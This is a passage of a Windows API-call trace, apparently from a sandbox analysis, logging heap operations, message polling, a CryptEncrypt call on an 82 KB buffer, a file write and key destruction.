hHeap=0x970000) returned 1 [0232.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0232.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0232.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0232.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56588 [0232.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0232.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0232.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0232.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0232.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0232.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0232.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0232.398] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51568, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0232.398] CryptEncrypt (in: hKey=0xa873d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x140f4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x140f8) returned 1 [0232.398] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.399] CharLowerBuffW (in: lpsz="byte[82168]", cchLength=0xb | out: lpsz="byte[82168]") returned 0xb [0232.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.403] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.403] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0232.405] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0232.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e514f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0232.405] CryptEncrypt (in: hKey=0xa873d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e94430*, pdwDataLen=0x8cef60*=0x140f4, dwBufLen=0x140f8 | out: pbData=0x2e94430*, pdwDataLen=0x8cef60*=0x140f8) returned 1 [0232.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.409] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.410] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.411] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0232.411] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.411] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0232.411] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0232.411] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0232.411] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.411] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0232.411] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0232.411] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.411] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0232.411] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.460] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.460] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.460] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.462] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0x140f8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0x140f8, lpOverlapped=0x0) returned 1 [0232.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0232.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0232.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0232.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0232.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0232.465] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0232.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0232.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0232.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0232.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0232.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0232.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0232.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0232.466] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0232.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0232.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55038 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0232.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0232.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0232.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0232.467] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0232.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0232.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0232.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0232.468] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0232.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0232.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0232.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0232.468] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0232.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0232.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0232.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0232.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0232.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0232.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0232.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0232.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0232.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0232.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0232.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0232.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0232.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0232.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0232.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0232.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0232.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0232.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0232.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0232.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0232.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0232.469] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0232.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0232.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0232.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0232.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0232.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0232.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0232.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0232.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0232.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0232.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0232.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0232.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0232.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0232.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0232.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0232.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0232.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0232.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0232.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0232.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0232.470] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51250, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0232.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0232.470] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0232.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0232.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0232.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0232.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0232.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0232.470] CryptDestroyKey (hKey=0xa873d0) returned 1 [0232.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0232.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0232.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0232.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0232.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0232.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0232.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0232.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0232.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0232.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0232.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0232.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0232.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0232.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0232.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0232.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0232.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0232.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0232.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0232.471] 